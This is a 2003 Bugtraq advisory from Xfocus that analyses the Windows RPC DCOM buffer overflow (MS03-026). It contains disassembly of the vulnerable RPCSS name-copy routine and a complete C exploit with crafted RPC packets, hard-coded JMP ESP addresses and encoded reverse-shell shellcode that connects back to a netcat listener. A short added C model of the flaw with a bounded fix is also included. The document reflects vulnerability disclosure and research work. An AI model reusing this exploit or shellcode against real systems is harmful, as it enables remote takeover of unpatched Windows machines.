bugtraq

The Analysis of LSD's Buffer Overrun in Windows RPC Interface

Author: Flashsky
Site: www.xfocus.org WWW.VENUSTECH.COM.CN WWW.SHOPSKY.COM
Email: flashsky@xfocus.org
Translator: benjurry
Email: benjurry@xfocus.org

Foreword

On Jul 16th, 2003, LSD published that they had discovered a critical security vulnerability in all recent versions of Microsoft operating systems. The vulnerability affects default installations of Windows NT 4.0, Windows 2000, Windows XP as well as Windows 2003 Server. But they did not publish code or any technical details. To analyse and exploit the vulnerability, members of Xfocus researched the problem and read the code day and night. Through this process we found the "Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability", and we have now worked out the cause of the vulnerability found by LSD. We thank all members of xfocus, and yuange, EYAS and IPXODI, who gave us much help. At the same time, we admire LSD for their brightness.

Analysis

In fact, MS03-026 fixes two vulnerabilities: one is a local stack overflow and the other is a remote stack overflow. Both result from the same interface; the improper API is the following:

HRESULT CoGetInstanceFromFile(
    COSERVERINFO * pServerInfo,
    CLSID * pclsid,
    IUnknown * punkOuter,
    DWORD dwClsCtx,
    DWORD grfMode,
    OLECHAR * szName,
    ULONG cmq,
    MULTI_QI * rgmqResults
);

The sixth parameter is szName. MSDN says of it: "File to initialize the object with using IPersistFile::Load. May not be NULL." This parameter will result in a buffer overflow:

hr = CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STGM_READWRITE,L"C:\\1234561111111111111111111111111.doc",1,&qi);

When the filename is too long, Windows produces a local buffer overflow, because the GetPathForServer function of RPCSS only has 0x220 bytes of stack space.
However, the API checks the file locally first, and we cannot create a file whose filename is longer than 0x220. So we cannot use this API to exploit directly, but we can use the LPC function by constructing the packet ourselves. Here we only focus on the remote stack overflow :)

After the client passes the parameter to the server, the server translates it into the following format:

L"\\servername\c$\1234561111111111111111111111111.doc"

Then the server gets the servername first. Here is the bug: Windows does not check the parameter and only reserves 0x20 bytes of stack, 0x20 being the maximum length of a NETBIOS name. So the buffer overflow comes into being. The key code is listed below:

GetPathForServer:
text:761543DA    push    ebp
text:761543DB    mov     ebp, esp
text:761543DD    sub     esp, 20h                 ; <----- the length is only 0x20
text:761543E0    mov     eax, [ebp+arg_4]
text:761543E3    push    ebx
text:761543E4    push    esi
text:761543E5    mov     esi, [ebp+hMem]
text:761543E8    push    edi
text:761543E9    push    5Ch
text:761543EB    pop     ebx
text:761543EC    mov     [eax], esi
text:761543EE    cmp     [esi], bx
text:761543F1    mov     edi, esi
text:761543F3    jnz     loc_761544BF
text:761543F9    cmp     [esi+2], bx
text:761543FD    jnz     loc_761544BF
text:76154403    lea     eax, [ebp+String1]       ; <----- address where the servername is placed, only 0x20 bytes long
text:76154406    push    0
text:76154408    push    eax
text:76154409    push    esi                      ; <----- here is the filename parameter
text:7615440A    call    GetMachineName
...

When the function returns, the buffer has already overflowed.
GetMachineName:
text:7614DB6F    mov     eax, [ebp+arg_0]
text:7614DB72    mov     ecx, [ebp+arg_4]
text:7614DB75    lea     edx, [eax+4]
text:7614DB78    mov     ax, [eax+4]
text:7614DB7C    cmp     ax, 5Ch                  ; <----- check whether it is 0x5C; if yes, the servername is over
text:7614DB80    jz      short loc_7614DB93
text:7614DB82    sub     edx, ecx
text:7614DB84
text:7614DB84 loc_7614DB84:                       ; CODE XREF: sub_7614DA19+178j
text:7614DB84    mov     [ecx], ax                ; <----- write the servername to the address; if longer than 0x20, the buffer overflow comes into being
text:7614DB87    inc     ecx
text:7614DB88    inc     ecx
text:7614DB89    mov     ax, [ecx+edx]
text:7614DB8D    cmp     ax, 5Ch
text:7614DB91    jnz     short loc_7614DB84
text:7614DB93

Now we have found the problem and can exploit it. The only issue is that the "\\servername" is supplied by the system, but we can construct it ourselves by sending malformed messages. BTW, the shellcode cannot contain 0x5C, because the function GetMachineName checks for it.

Exploit:

1. The exploit uses JMP ESP (FF E4) to jump, so the address must be adjusted for other Windows versions.
2. The shellcode connects back (reverse connection), so we should run nc -l -p XXX first.
3. The length of the shellcode must satisfy sizeof(shellcode)/16 = 12; if not, please pad it with 0x90, or the RPC packet format will be wrong.
4. Before the overflowed function returns, the two parameters after the return address are still used, so we must make sure those addresses are writable.
5. The exploit uses JMP ESP; it could also be exploited by overwriting the SEH.
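The unchecked copy described above, modelled as an added example (not code from the original post or from RPCSS): machine_name_wchars() mirrors what GetPathForServer and GetMachineName do with the UNC path, name_overflows_frame() tells whether that copy would overrun the 0x20-byte stack slot, and get_machine_name_bounded() is the length-checked form a fixed version needs. WCHAR16, the function names and the 40-character sample server name are assumptions made for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

typedef uint16_t WCHAR16;                    /* stand-in for the Windows WCHAR */
#define NAME_BUF_BYTES  0x20                 /* "sub esp, 20h" in GetPathForServer */
#define NAME_BUF_WCHARS (NAME_BUF_BYTES / sizeof(WCHAR16))
#define BACKSLASH       0x5C                 /* the only terminator GetMachineName looks for */

/* Widen an ASCII UNC path into UTF-16 (helper for the example, not part of RPCSS). */
static size_t ascii_to_w16(const char *s, WCHAR16 *out, size_t cap) {
    size_t n = 0;
    while (s[n] && n + 1 < cap) { out[n] = (WCHAR16)(unsigned char)s[n]; n++; }
    out[n] = 0;
    return n;
}

/* WCHARs GetMachineName would copy: GetPathForServer first requires two
   leading backslashes, then the copy loop starts at the third WCHAR and
   runs until the next 0x5C with no length bound.  The real loop has no NUL
   check either; this model stops at NUL so that it cannot itself run away. */
size_t machine_name_wchars(const WCHAR16 *path) {
    size_t n = 0;
    if (path[0] != BACKSLASH || path[1] != BACKSLASH) return 0;
    for (const WCHAR16 *p = path + 2; *p != BACKSLASH && *p != 0; p++) n++;
    return n;
}

/* True when the name plus its terminator would not fit the 0x20-byte frame slot. */
bool name_overflows_frame(const WCHAR16 *path) {
    return (machine_name_wchars(path) + 1) * sizeof(WCHAR16) > NAME_BUF_BYTES;
}

/* Bounded replacement for the copy: refuse the path instead of overrunning `out`. */
bool get_machine_name_bounded(const WCHAR16 *path, WCHAR16 *out, size_t cap) {
    size_t n = machine_name_wchars(path);
    if (n + 1 > cap) { out[0] = 0; return false; }
    for (size_t i = 0; i < n; i++) out[i] = path[2 + i];
    out[n] = 0;
    return true;
}

/* Narrow-string front ends so the checks can be driven from plain C strings. */
size_t unc_name_wchars(const char *unc) {
    WCHAR16 w[256]; ascii_to_w16(unc, w, 256); return machine_name_wchars(w);
}
bool unc_name_overflows(const char *unc) {
    WCHAR16 w[256]; ascii_to_w16(unc, w, 256); return name_overflows_frame(w);
}
bool unc_name_accepted(const char *unc) {
    WCHAR16 w[256], out[NAME_BUF_WCHARS];
    ascii_to_w16(unc, w, 256);
    return get_machine_name_bounded(w, out, NAME_BUF_WCHARS);
}
```

A 15-character name plus its terminator is exactly 0x20 bytes and is accepted; anything longer is rejected by the bounded form instead of overrunning the frame.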
#include <stdio.h> #include <winsock2.h> #include <windows.h> #include <process.h> #include <string.h> #include <winbase.h> #pragma comment(lib,"ws2_32") unsigned char bindstr[]=3D{ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,= 0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,= 0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,= 0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]=3D{ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04= ,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58= ,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D= ,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00= ,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1= ,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00= ,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD= ,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00= ,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00= ,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00= ,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00= ,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC= ,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD= ,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00= ,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00= ,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00= ,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00= ,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88= ,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00= ,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66= ,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00= ,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06= ,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE= ,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC= ,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00= ,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00= ,0x00,0xC0,0x01 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00= ,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00= ,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17= ,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC= ,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00= ,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC= ,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC= ,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00= ,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]=3D{ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]=3D{ 0x5C,0x00 ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34= ,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31= ,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31= ,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned int jmpesp_cn_sp3 =3D "\x29\x2c\xe2\x77"; unsigned int jmpesp_cn_sp4 =3D "\x29\x4c\xdf\x77"; unsigned int jmpesp_en_xp_sp1=3D"\xdb\x37\xd7\x77"; unsigned char sc[]=3D "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" = "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x0= 0" "\x46\x00\x58\x00\x46\x00\x58\x00" "\x29\x4c\xdf\x77" //sp4 //"\x29\x2c\xe2\x77"//0x77e22c29 "\x38\x6e\x16\x76\x0d\x6e\x16\x76" 
//=D0=E8=D2=AA=CA=C7=BF=C9=D0=B4=B5=C4=C4=DA=B4=E6=B5=D8=D6=B7 = //=CF=C2=C3=E6=CA=C7SHELLCODE=A3=AC=BF=C9=D2=D4=B7=C5=D7=D4=BC=BA=B5=C4SHELLCODE=A3=AC=B5=AB=B1=D8=D0=EB=B1=A3=D6=A4sc=B5=C4=D5=FB=CC=E5=B3=A4=B6=C8= /16=3D12=A3=AC=B2=BB=C2=FA=D7=E3=D7=D4=BC=BA=CC=EE=B3=E4=D2=BB=D0=A90X90=B0=C9 //SHELLCODE=B2=BB=B4=E6=D4=DA0X00=A3=AC0X00=D3=EB0X5C = "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x0= 1" = "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x3= 0" "\x93\x40\xe2\xfa" // code = "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe= 1" = "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd= 2" = "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x9= 3" = "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe= 7" = "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc= 0" = "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf= 8" = "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x9= 3" = "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x9= 3" = "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe= 0" = "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x8= 7" = "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x6= 0" = "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc= 5" = "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x9= 0" = "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x2= 2" = "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x1= 8" = "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x9= 2" = "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc= 3" = "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x9= 3" = "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf= 9" = "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x1= 8" = 
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char request4[]={
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00,
0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C,
0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short port1;
    DWORD cb;

    printf("RPC DCOM overflow Vulnerability discoveried by LSD\n");
    printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
    printf("Welcome to our English Site: http://www.xfocus.org\n");
    printf("Welcome to our Chinese Site: http://www.xfocus.net\n");
    if(argc<5)
    {
        printf("useage:%s targetip localIP LocalPort SPVersion\n",argv[0]);
        printf("SPVersion:\n0 w2k Chinese version +sp3\n 1 w2k Chinese version +SP4\n 2 winxp English version +sp1\n");
        exit(1);
    }
    if(atoi(argv[4])==0)
        memcpy(sc+36,jmpesp_cn_sp3,sizeof(jmpesp_cn_sp3));
    else if (atoi(argv[4])==1)
        memcpy(sc+36,jmpesp_cn_sp4,sizeof(jmpesp_cn_sp4));
    else if (atoi(argv[4])==2)
        memcpy(sc+36,jmpesp_en_xp_sp1,sizeof(jmpesp_en_xp_sp1));

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
    port1 = htons(atoi(argv[3]));   // port for the reverse connection
    port1 ^= 0x9393;
    cb=inet_addr(argv[2]);          // IP for the reverse connection
    cb ^= 0x93939393;
    *(unsigned short *)&sc[330+0x30] = port1;
    *(unsigned int *)&sc[335+0x30] = cb;
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;      // compute the filename length in wide characters
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;  // compute the filename length in wide characters
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;        // compute the lengths of the various structures
    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return;
    }
    len=recv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return;
    }
    len=recv(sock,buf1,1024,NULL);
}

About XFOCUS.ORG

Xfocus is a non-profit and free
technology organization which was founded in 1998 in China. We are devoted to the research and demonstration of weaknesses related to network services and communication security. We hope that we can use new technical tools to achieve our goal and to broaden our outlook. We also hope we can communicate with and help each other through this amazing Internet.

From the Internet. For the Internet. Have fun!

---

Regards!

xundi
xundi@xfocus.org
2003-07-25